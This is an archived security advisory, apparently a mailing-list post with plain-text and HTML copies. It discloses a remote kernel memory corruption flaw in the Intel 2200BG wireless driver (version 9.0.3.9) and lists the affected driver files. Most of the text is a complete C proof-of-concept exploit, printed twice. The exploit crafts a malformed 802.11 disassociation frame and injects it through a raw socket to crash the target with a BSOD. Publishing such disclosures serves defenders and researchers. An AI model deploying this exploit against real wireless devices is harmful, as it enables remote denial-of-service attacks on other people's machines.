The Intel wireless mini-pci driver provided with Intel 2200BG cards is vulnerable to a remote memory corruption flaw. Malformed disassociation packets can be used to corrupt internal kernel structures, causing a denial of service (BSOD). Proof of concept exploit included.
96c1c5bf7fd32a53f660b0d112ab257bb65b17df4bb6322e76691519e7c61735
------=_Part_72042_24806074.1169818557157
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)
This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)
Proof Of Concept:
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// 28 bytes disassociation packet.
char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal
0x00, 0x00, // Duration ID
0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
0x00, 0x00, // Frag. Number
0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code
int main() {
struct sockaddr_ll link;
struct ifreq iface;
int s;
char packet[sizeof(d)];
int len = 0;
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
return 0;
bzero(&iface,sizeof(iface));
bzero(&link,sizeof(link));
bzero(packet,sizeof(d));
strcpy(iface.ifr_name,"ath0raw");
if(ioctl(s,SIOCGIFHWADDR, &iface)) {
return 0;
}
if(ioctl(s,SIOCGIFINDEX, &iface)) {
return -1;
}
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
return -1;
}
link.sll_family = AF_PACKET;
link.sll_ifindex = iface.ifr_ifindex;
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
return -1;
}
memcpy(packet,d,sizeof(d));
len = sendto(s,packet,sizeof(d), 0, NULL, 0);
usleep(5000);
printf("%d bytes enviados\n",len);
close(s);
return 0;
}
------=_Part_72042_24806074.1169818557157
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<p>Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption</p>
<p>Description: The intel wireless mini-pci driver provided with Intel<br>2200BG cards is vulnerable to a remote memory corruption flaw.<br>Malformed disassociation packets can be used to corrupt internal kernel<br>structures, causing a denial of service (BSOD)
</p>
<p>This vulnerability was found at Intel 2200 driver version 9.0.3.9(09/12/2005).</p>
<p>Driver files:</p>
<p>w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725<br>w29mlres.dll 35afeccc4092b69f62d757c4707c74e9<br>w29NCPA.dll 980f58b157baedc23026dd9302406bdd</p>
<p>Author: Breno Silva Pinto ( <a href="https://Sekure.org">Sekure.org</a> ) / bsilva[at]sekure[dot]org)<br> </p>
<p>Proof Of Concept:</p>
<p>#include <unistd.h><br>#include <sys/types.h><br>#include <sys/socket.h><br>#include <sys/ioctl.h><br>#include <asm/types.h><br>#include <linux/if.h><br>#include <linux/if_packet.h>
<br>#include <linux/if_ether.h><br>#include <linux/if_arp.h><br>#include <netinet/in.h><br>#include <stdlib.h><br>#include <string.h><br>#include <stdio.h></p>
<p>// 28 bytes disassociation packet.</p>
<p>char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal<br> 0x00, 0x00, // Duration ID<br> 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr<br> 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
<br> 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id<br> 0x00, 0x00, // Frag. Number<br> 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code</p>
<p>int main() {<br> struct sockaddr_ll link;<br> struct ifreq iface;<br> int s;<br> char packet[sizeof(d)];<br> int len = 0;</p>
<p> if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)<br> return 0;</p>
<p> bzero(&iface,sizeof(iface));<br> bzero(&link,sizeof(link));<br> bzero(packet,sizeof(d));</p>
<p> strcpy(iface.ifr_name,"ath0raw");</p>
<p> if(ioctl(s,SIOCGIFHWADDR, &iface)) {<br> return 0;<br> }<br> <br> if(ioctl(s,SIOCGIFINDEX, &iface)) {<br> return -1;<br> }</p>
<p> if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {<br> return -1;<br> }</p>
<p> link.sll_family = AF_PACKET;<br> link.sll_ifindex = iface.ifr_ifindex;<br> <br> if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {<br> return -1;<br> }</p>
<p> memcpy(packet,d,sizeof(d));<br> len = sendto(s,packet,sizeof(d), 0, NULL, 0);<br> usleep(5000); <br> printf("%d bytes enviados\n",len);</p>
<p> close(s);</p>
<p> return 0;<br>}</p>
<p> </p>
------=_Part_72042_24806074.1169818557157--